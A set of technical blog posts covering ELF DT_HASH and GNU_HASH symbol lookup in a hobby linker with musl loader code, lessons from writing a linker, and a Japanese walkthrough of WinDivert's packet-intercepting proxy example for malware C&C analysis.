Actually, 4bytes on each hash value are not enough considering possibility of hash collision. For instance, you need to store a chain to trace when a given symbol is not matched with the element stored in the table index and two hash values are shared between multiple API strings.

If a hash collides, then the index of the array stores an index of next symbol table index. The last element of the chain means index is 0.

static Sym *sysv_lookup(const char *s, uint32_t h, struct dso *dso)
{
    size_t i;
    Sym *syms = dso->syms;
    Elf_Symndx *hashtab = dso->hashtab;
    char *strings = dso->strings;
    for (i=hashtab[2+h%hashtab[0]]; i; i=hashtab[2+hashtab[0]+i]) {
        if ((!dso->versym || dso->versym[i] >= 0)
            && (!strcmp(s, strings+syms[i].st_name)))
            return syms+i;
    }
    return 0;
}

Considering these, a linker needs to prepare a code for generating corresponding output.

static void check_collision(uint32_t* bucket, uint32_t* chain, uint32_t mod, uint32_t sym_index) {

  uint32_t* p = 0;
  if (*(bucket + mod)) {   
    for (p = chain + *(bucket + mod) ; *p ; p = chain + *p);
    *p = sym_index;
  } else {
    // no collision
    *(bucket + mod) = sym_index;
  }
}

First, you take a look at bucket *(bucket + mod). If it does not collide, insert symbol table index. If it does, then trace the chain which stores next symbol information, for (p = chain + *(bucket + mod) ; *p ; p = chain + *p); and set symbol index at the tail of it.

DT_GNU_HASH

typedef struct {
  uint32_t nbuckets;
  uint32_t symoffset;
  uint32_t bloom_size;
  uint32_t bloom_shift;
  size_t bloom[/*bloom_size*/];
  uint32_t buckets[/*nbuckets*/];
  uint32_t chain[];
} gnu_hash_table;

After all, you have to call strcmp to validate if the chain matches the input, and DT_HASH does so often. It is much less than calling all of it if bucket is big enough and hash values are distributed rather equally.

Most cases, an import API wants to find just one export API on multiple dynamic symbol tables on each dynamic shared objects. And the cost depends on number of all export symbols on every shared library before matched one because elf loader does not remember any tags of API and shared library name unlike on windows. People started introducing bloom filter which prevents iterating hash table on hash collision.

The idea sounds difficult, but code is not as difficult as it sounds.

static inline struct symdef find_sym2(struct dso *dso, const char *s, int need_def, int use_deps)
{
    uint32_t h = 0, gh = gnu_hash(s), gho = gh / (8*sizeof(size_t)), *ght;
    size_t ghm = 1ul << gh % (8*sizeof(size_t));
    struct symdef def = {0};
    struct dso **deps = use_deps ? dso->deps : 0;
    for (; dso; dso=use_deps ? *deps++ : dso->syms_next) {
        Sym *sym;
        if ((ght = dso->ghashtab)) {
            sym = gnu_lookup_filtered(gh, ght, dso, s, gho, ghm);

static Sym *gnu_lookup_filtered(uint32_t h1, uint32_t *hashtab, struct dso *dso, const char *s, uint32_t fofs, size_t fmask)
{
    const size_t *bloomwords = (const void *)(hashtab+4);
    size_t f = bloomwords[fofs & (hashtab[2]-1)];
    if (!(f & fmask)) return 0;

    f >>= (h1 >> hashtab[3]) % (8 * sizeof f);
    if (!(f & 1)) return 0;

    return gnu_lookup(h1, hashtab, dso, s);
}

GNU_HASH_TABLE manages so called bloom bits to record if a given symbol exists on the entire hash table.

From the above code, you can see next interpretation.

Set a bit vector named bloomword

const size_t *bloomwords = (const void *)(hashtab+4);
Pick up an index of bit vectors chunked by 8 * sizeof(size_t).
gho = gh / (8*sizeof(size_t))
size_t f = bloomwords[fofs & (hashtab[2]-1)];
Set two bits on it.
// 1 << (hash % (8 * sizeof(size_t)))
size_t ghm = 1ul << gh % (8*sizeof(size_t));
// (hash >> bloom shift) % (8 * sizeof(size_t))
f >>= (h1 >> hashtab[3]) % (8 * sizeof f);
If the one of bits is not set. you can make sure the symbol is not on the hash table.
if (!(f & fmask)) return 0;
if (!(f & 1)) return 0;

Given this, linker should prepare the bloom bits together with storing an export symbol.

static void set_bloom_bits(uint32_t gh) {

  gnu_hash_table* hash_table_p = D[GNU_HASH_INDEX].data_p;
  size_t shift1 = gh % (8*sizeof(size_t));
  size_t shift2 = (gh >> hash_table_p->bloom_shift) % (8 * sizeof (size_t));
  size_t bit1 = 1ul << shift1;
  size_t bit2 = 1ul << shift2;

  // 32bit hash is devided by 64 or 32 and get the index of bloom vector.
  uint32_t index = gh / (8*sizeof(size_t));
  size_t* vector = &hash_table_p->bloom_array + (index & (hash_table_p->bloom_size-1));
  *vector = *vector | bit1 | bit2;
}

Argument gh is a value coputed by the hash function.

Bit vector is &hash_table_p->bloom_array.
Index of bit vector is (hash value % 64(or 32)) & (bloomsize - 1).

After you know which 64bit vector needs to be modified, compute bit in a following way.
- original hash value % 64(or 32)
- shifted hash value %64 (or 32)
  amount of shift is specified by bloom_shift parameter.
  And the two bits wake up specified by *vector = *vector | bit1 | bit2; unless they had been set already.

Note if bloom shift is zero, only 1 bit is set.

Implementing this filter, I confirmed export symbol was successfully not filtered by previous dynamic loader provided by musl libc when it was called from others because the bits which suggest its existance is set.

After passing through bloom filter, computed hash will be addressed by GNU HASH.

Loader code is as follows.

static Sym *gnu_lookup(uint32_t h1, uint32_t *hashtab, struct dso *dso, const char *s)
{
    uint32_t nbuckets = hashtab[0];
    uint32_t *buckets = hashtab + 4 + hashtab[2]*(sizeof(size_t)/4);
    uint32_t i = buckets[h1 % nbuckets];

    if (!i) return 0;

    uint32_t *hashval = buckets + nbuckets + (i - hashtab[1]);

    for (h1 |= 1; ; i++) {
        uint32_t h2 = *hashval++;
        if ((h1 == (h2|1)) && (!dso->versym || dso->versym[i] >= 0)
            && !strcmp(s, dso->strings + dso->syms[i].st_name))
            return dso->syms+i;
        if (h2 & 1) break;
    }

    return 0;
}

It is not exactly like DT HASH.
Common thing is * both bucket contains symbol index on its bucket.
* When collision, you do not update any bucket but only chain. (this makes sense since the bucket was full)

But, how chains are filled up and traced are different.

DT HASH represents a chain as index of next symbol table terminated by zero. Bucket stores current symbol table index. Do not confuse.

GNU HASH instead store almost hash value itself on chain. uint32_t *hashval = buckets + nbuckets + (i - hashtab[1]);

This hash comparison is operated before every strcmp to call it less often. if ((h1 == (h2|1)) && (!dso->versym || dso->versym[i] >= 0)

When hash collision occurred, which means the loop iterates nexts, two values are incremented.

symbol table index i which are stored on first encountered bucket.
Array which stores chain (uint32_t*)hashval Do not confuse with
- hash value itself (uint32_t*)hashval
- bucket array &buckets[i]
  This comes after bucket array.

That says, when hash collision occurred for storing a symbol, you should take following two values and increments them. In fact, 1 & 2 are in a sense shared because a symbol table index corresponds to an index of chain array as there are as many numbers of elements as the index of symbols.

2 is understandable. I have stumbled on 1 and considered heavily what is meant by incrementing symbol table index. After all, I implemented generation code in something like below. And it seems to work.

static void check_gnu_hash_collision
(
 uint32_t* bucket, uint32_t* chain,
 uint32_t gh, uint32_t mod,
 uint32_t sym_index, uint32_t sym_offset) {

  uint32_t* p = bucket + mod;
  if (*p) {
    p = chain + *p - sym_offset;
    for (;*p;p++);
    *p = gh & -2;
  } else {
    *p = sym_index;
    *(chain + sym_index - sym_offset) = gh & -2;
     }
}

When hash collision occurred if (*p) {},

I only update(for (;*p;p++);) pointer to chain array p = chain + *p - sym_offset;.
If it comes an emptiness, fill the almost hash value *p = gh & -2;.

gh & -2 is rightest 1bit is used for checking emptiness of chain, not for validating hash value.

This seems to depend how symbols are stored on the hash table. If you try to store a symbol whose symbol table index is maximum of the symbol table, then obviously, it might not work when a value which shares same hash comes, as it will exceed maximum index of chain.

But, so far, it works as a symbol which has younger index comes forward on my linker.

https://github.com/Hiroshi123/bin_tools/blob/master/src/core/link/elf/dynamic.c

If you find a bug, tell me anything.

2020-05-06

About linker development

linker

It has been already a half year since I've written an article about a draft of my linker (http://vrodxda.hatenablog.com/entry/2019/11/30/160029) for PE format.

Since then, it had been progressed slowly from time to time. (https://github.com/Hiroshi123/bin_tools/tree/master/src/core/link)

Looking back the trajectory so far, I have added

memory allocation ( https://github.com/Hiroshi123/bin_tools/wiki/memory-allocator / https://github.com/Hiroshi123/bin_tools/blob/master/src/core/memory/alloc.c )
linker script support (only partially for coff)
an ELF format support (full dynamic linking support)
packing capability(so far not much though)

Although it is still on the way, I will write down something I have learned from my linker development to somebody who is suppose to write an own linker.

Necessity of custom Loader

Passing through at some point, what needs to be taken into account with much considerations is about dynamic loader investigation for dynamic API relocation.
In my opinion, this sets an exclusive barrier to write a linker.

It is not enough to have a debugger and default pre-set loader to validate an output of a linker because you cannot debug at some part. To iterate rapidly the output validation test, you need to have at least one custom loader which ideally resembles the default loader.

On linux, I prefer to build musl libc( https://www.musl-libc.org/ ) by myself inserting printf where I need to know. Often, there are some differences between default libc from glibc. Still considering amount of code size which needs to be read and length of build time, it is good to pick one of light-weight libc up for the job.

On windows, default linker lives in ntdll!LdrInitializeThunk(http://vrodxda.hatenablog.com/entry/2019/09/18/085454) It seems that there are no alternatives and source codes unlike libc.

Luckily, there are lots of custom loader available if you google it by reflective PE loader. This is one of the technique which malware favours. Previously, I did some research for my job to investigate emotet loader, and it helped me a lot for validating intermediate output of my linker because it has less code and functionality and can let it executable without generating a new process.

Do not stick to what it formally should be

What made my progress slow was persistence to the output of default linker.
There might be some motivation to develop a linker. It might be for malware analysis, making ctf challenge, or just a mere curiosity.
In case, I did not set any objectives for my development at first point and tried to generate as default linker does. And, I came across so many bugs which come from non-essential functionalities.

These are for example in my case 1. Multiple loadable program headers .e.g. alignment 2. Preparation of section and Symbol which can be stripped

Regarding 1, default linker tries to let every loadable section into a shared program header if its protection is shared. I was not good at implementing this feature in a satisfiable way.
This is because if you allow multiple program headers, section order needs to be flexible and some header might come after the range where its size is fixed after relocation. This lets linking process complex and slow as you need to iterate re-computation relocation address and relocation itself.

At some point, I made a decision that I let every loadable section on one uniformed program header no matter what and do extra mapping and protection later on like UPX does.

For instance, .plt and .got are composed together and put aligned as I do not want to fix the virtual address even when relocation is on the way.

// .plt 
// jump the address loading from 4byte from next two byte
0xff 0x25 0x02 0x00 0x00 0x00 
// just for pudding
0x00 0x00
// .got comes here
0x00 0x00 0x00 0x00 0x00 0x00 0x00

Indeed, you cannot use default loader protection GNU_RELRO as it is on a same page. Nevertheless, I did not want to manage complexity which inherits from original linker design.

Good for making CTF challenge

Unintentionally, a generated elf executable provides nothing to objdump and less information to readelf keeping it still viable. This might come from at some degree dropping of formalness which I have written above.
Since I love obfuscation and de-obfuscation, this design feels good to me.
I enjoy thinking these days how challenging a question could be with it.
For instance, it is not difficult to prevent debuggers from stepping in if you write some initial routines before __libc_start_main. I do not know many challenges where a question had been implemented from linking level, but it should be enjoyable from both challenge providers & solvers if it is linked in a special way.

2020-01-03

windowsでパケットをinterceptするツール

windivert

年末年始休暇を利用して、windowsでパケットをインターセプト(capture + drop)する方法を探していてwindivert(https://github.com/basil00/Divert)というライブラリを見つけた。
npcap/winpcap辺りだと、dropができないようなので。良いツールだが、日本語の紹介記事が無いので書いている。

そもそもの目的としては、解析に辺り、以下の様な点を解消してくれるツールを探していた。

c&cサーバとの通信のプロキシ
c&cサーバとの通信パケットの中身を別サーバでフックしたい。
SSL通信の可視化
所謂,SSL inspection。
c&cサーバが死んでいる場合の擬似サーバ設置
通信したc&cサーバの接続先IPが変更された場合も解析したい。

自動化難易度的には1<2<3である。 windivertは、少なくとも1に関しては、そのままでも満たせそうなツールだ。

プロキシの例

examplesの中でも最も秀逸だと思った物が

Divert/streamdump.c at master · basil00/Divert · GitHub

やっていることは、いわゆる、NAPT(ポートフォワーディング + IP変換)によるプロキシサーバ生成。
コードの簡潔さがすごい。

まず、ハイレベルな文法でcapture対象のパケットを指定する。今回は、トランスポート層における3つの送受信元先のポート宛てのパケットをcaptureする。

"tcp and "
        "(tcp.DstPort == %d or tcp.DstPort == %d or tcp.DstPort == %d or "
         "tcp.SrcPort == %d or tcp.SrcPort == %d or tcp.SrcPort == %d)",

それぞれ、

captureしたい宛先ポート
proxy serverの受信元ポート
代理クライアントの送信先ポート

代理クライアントの送信先ポートは実際に送信が行われるポートでは無いが、captureしたいポートへの出力への出力はforwardingされる為、裏の出口ポートとして設定されている。詳しくは後述。

基本的には、

 handle = WinDivertOpen(filter, WINDIVERT_LAYER_NETWORK, priority, 0);

でcaptureするレイヤーを決定(今回は、L3(IPヘッダ以上)がcaptureできる)し、

WinDivertRecv(handle, packet, sizeof(packet), &packet_len, &addr)

...

WinDivertSend(handle, packet, packet_len, NULL, &addr)

recvとsendの間にfilterする処理を書くという流れ。
recvとsendの間にpacketの内容を書き換えたり、条件により、sendを行わないことでdropできる。

今回の例では、規則として、以下を記述している。

外部への通信(IPヘッダの送信元=ホストのIP & 送信先/=ホストのIP)の場合

規則1. 宛先ポートの通信をインバウンドに変換

送信先ポート : 監視したいポート -> proxy serverのポート
IP : 送信元IP <-> 送信先IP

規則2. プロキシサーバから外部への通信の送信元の書き換え

送信元ポート : proxy serverのポート-> フック対象ポート
IP : 送信元IP <-> 送信先IP

規則3. 代替ポートへの外部向けの送信をフック対象ポートに戻す

送信先ポート : 代替ポート -> フック対象ポート

外部から内部への通信

規則4. フック対象ポートからの通信を代替ポートからの通信へと偽装

以上のルールの元、proxy server(以下,server1), また、フック対象への通信ごとに、別スレッドで肩代わりするクライアント(client0)を設け、外部のサーバとの接続確立を行い、送受信用に２つスレッドを設ける。
- 内部から外部への通信のためのスレッド(以下,client1)
- 外部から内部への通信のためのスレッド(以下,client2)

TCP handshakeの例

TCPの場合を例に出す。説明のために、フック対象ポートを443とする。

server1 の役割

server1はフック対象元のポートに通信を行ったソケットからの接続を代替する。

あるプロセスから443への接続が行われる。
通信を行ったsynパケットが規則1により、送信先ポートが変換され、IPも送信先元が反転されるため、proxy serverのポートでlisten中のサーバに届く。
proxy serverは(というかドライバ側で)、syn/ackパケットを1で通信を行ったクライアントの送信元ポートに送信する。
syn/ackパケットは、送信元ポートがproxy serverのポートであり、かつ、2のIP反転により外部向けの通信になっている。そのため、規則2により、送信元ポートが443に置き換えられ、IPアドレスの送信先/元も反転される。
1で接続を行ったプロセスがackパケットを再度サーバに送る。
1と同じ原理で、proxy serverのソケットにパケットが届く。
この段階で、サーバのapplicationレイヤーのaccept処理(https://github.com/basil00/Divert/blob/master/examples/streamdump/streamdump.c#L302)が返る。

client0の役割を説明

7のaccept後、1つの新しく生成されたスレッドと、同スレッドそれぞれでソケットが生成される。

1つは、外部の443への接続を肩代わりする物である。

この通信先は、application側では代替ポート宛てに通信を行うが、ドライバで規則3によりフック対象ポート443に書き換えられる。規則3はIPの変換はなく、通信はそのまま外部に出ていく。
生の通信先からのsyn/ackが帰ってくる。通信は、規則4により代替ポートからの通信と解釈される。
代替ポートに、ackを送り、connect(https://github.com/basil00/Divert/blob/master/examples/streamdump/streamdump.c#L360)関数が返る。

なお、接続が確立すると、スレッドを生成し、1つで実際のサーバとのやりとり、もう一方で、クライアントとのやりとりが行われる。なお、通常のクライアントは、recvしたソケットに再度sendを行うが、この場合、
送信側 : proxyサーバのソケットでrecvし、(パケットに対して任意の処理を行った後、)実際のサーバとのやりとりに使う外部向けソケットにsendする
受信側 : 外部向けソケットでrecvし、proxyサーバのポート(を送信先)として、(acceptしたポート宛てに)sendする

となっている。

sendした場合

あるプロセスから接続確立済み、外部443ポートへのサーバへパケットを送信する。
外部向けの通信は規則1により、proxy server向けの通信に変換される。
生成されたデータは、proxyサーバ上で待つ1つのスレッドに補足され、そのサーバは、代替ポート先へ再度sendを行う。
代替ポートへのsendは、規則3により443に変換され、送信される。

recvした場合

あるプロセスの接続先サーバからパケットが届く。
規則4により送信元(サーバの)ポートが代替ポートに変換される。
代替ポート先にrecvを行っていたスレッドの処理を起こし、そのスレッドが、proxyサーバのソケットを利用してsendする。この場合、送信元がproxy serverになる。なお、IPアドレスは、受信先を送信先に設定するので、外部向け通信となる。
proxyサーバのポートからの外部向けは、規則2より、内部向け、かつ、フック対象ポート(443)に形式上変換される。

補足

l2レイヤー(MACアドレス)のcapture,interceptはできません。
クライアントの送信元ポートが指定されているプロトコルだと上手く行きません。
自分の理解の為にまとめたけど、実際にpacket captureしながら触ってみないとわかりずらいかも。。